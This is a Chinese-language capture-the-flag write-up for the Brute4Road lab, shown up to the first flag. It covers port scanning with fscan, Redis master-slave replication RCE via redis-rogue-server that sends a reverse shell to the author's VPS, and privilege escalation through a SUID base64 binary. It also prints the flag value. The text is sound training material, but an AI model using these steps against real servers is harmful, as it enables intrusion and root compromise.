Brute4Road
信息
Tags
- Redis - Redis 主从复制 RCE
- Brute Force - Mssql 密码爆破
- SMB - SMB 哈希传递
- Privilege Elevation - Linux Suid Privilege
- 域渗透 - 约束委派攻击
靶标介绍
Brute4Road 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
入口点
39.98.113.15
入口点探测
使用 fscan
对入口点进行扫描
┌──(randark ㉿ kali)-[~]
└─$ ./tools/fscan-1.8.4/fscan -h 39.98.113.15
39.98.113.15:21 open
39.98.113.15:22 open
39.98.113.15:6379 open
39.98.113.15:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.98.113.15 code:200 len:4833 title:Welcome to CentOS
[+] ftp 39.98.113.15:21:anonymous
[->]pub
[+] Redis 39.98.113.15:6379 unauthorized file:/usr/local/redis/db/dump.rdb
对 ftp 匿名登陆进行尝试,为空目录
尝试对 Redis 服务基于主从复制进行 RCE 利用
入口点 Redis 主从复制 RCE
使用 n0b0dyCN/redis-rogue-server: Redis(< =5.0.5) RCE
在 vps 上建立一个恶意服务器构建 Rsdis 主从复制 RCE 执行 Reverse Shell
root@jmt-projekt:~/redis-rogue-server# ./redis-rogue-server.py --rhost 39.98.113.15 --lhost 139.*.*.*
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \'__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 39.98.113.15:6379
[info] SERVER 139.*.*.*:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 139.*.*.*
Reverse server port: 9999
[info] Reverse shell payload sent.
[info] Check at 139.*.*.*:9999
[info] Unload module...
执行成功后收到反连 shell
root@jmt-projekt:~# pwncat-cs -lp 9999
[13:43:11] Welcome to pwncat 🐈!
[13:49:16] received connection from 39.98.113.15:53840
[13:49:17] 0.0.0.0:9999: normalizing shell path
[13:49:18] 39.98.113.15:53840: registered new host w/ db
(local) pwncat$ back
(remote) redis@centos-web01:/usr/local/redis/db$ whoami
redis
入口点 提权
发现 flag 文件 /home/redis/flag/flag01
-r-------- 1 root root 1.6K Jul 23 13:47 flag01
由于权限限制,需要提权到 root 用户才能读取 flag,尝试扫描 suid 特权文件并借此提权
(remote) redis@centos-web01:/home/redis/flag$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
(remote) redis@centos-web01:/home/redis/flag$ /usr/bin/base64 /home/redis/flag/flag01 | /usr/bin/base64 -d
██████ ██ ██ ███████ ██
░█░░░░██ ░██ █░█ ░██░░░░██ ░██
░█ ░██ ██████ ██ ██ ██████ █████ █ ░█ ░██ ░██ ██████ ██████ ░██
░██████ ░░██░░█░██ ░██░░░██░ ██░░░██ ██████░███████ ██░░░░██ ░░░░░░██ ██████
░█░░░░ ██ ░██ ░ ░██ ░██ ░██ ░███████░░░░░█ ░██░░░██ ░██ ░██ ███████ ██░░░██
░█ ░██ ░██ ░██ ░██ ░██ ░██░░░░ ░█ ░██ ░░██ ░██ ░██ ██░░░░██ ░██ ░██
░███████ ░███ ░░██████ ░░██ ░░██████ ░█ ░██ ░░██░░██████ ░░████████░░██████
░░░░░░░ ░░░ ░░░░░░ ░░ ░░░░░░ ░ ░░ ░░ ░░░░░░ ░░░░░░░░ ░░░░░░
flag01: flag{c9a177cc-f8c5-4077-91c6-c8d57609fc57}
Congratulations! ! !
Guess where is the second flag?
flag - 01
██████ ██ ██ ███████ ██
░█░░░░██ ░██ █░█ ░██░░░░██ ░██
░█ ░██ ██████ ██ ██ ██████ █████ █ ░█ ░██ ░██ ██████ ██████ ░██
░██████ ░░██░░█░██ ░██░░░██░ ██░░░██ ██████░███████ ██░░░░██ ░░░░░░██ ██████
░█░░░░ ██ ░██ ░ ░██ ░██ ░██ ░███████░░░░░█ ░██░░░██ ░██ ░██ ███████ ██░░░██
░█ ░██ ░██ ░██ ░██ ░██ ░██░░░░ ░█ ░██ ░░██ ░██ ░██ ██░░░░██ ░██ ░██
░███████ ░███ ░░██████ ░░██ ░░██████ ░█ ░██ ░░██░░██████ ░░████████░░██████
░░░░░░░ ░░░ ░░░░░░ ░░ ░░░░░░ ░ ░░ ░░ ░░░░░░ ░░░░░░░░ ░░░░░░
flag01: flag{c9a177cc-f8c5-4077-91c6-c8d57609fc57}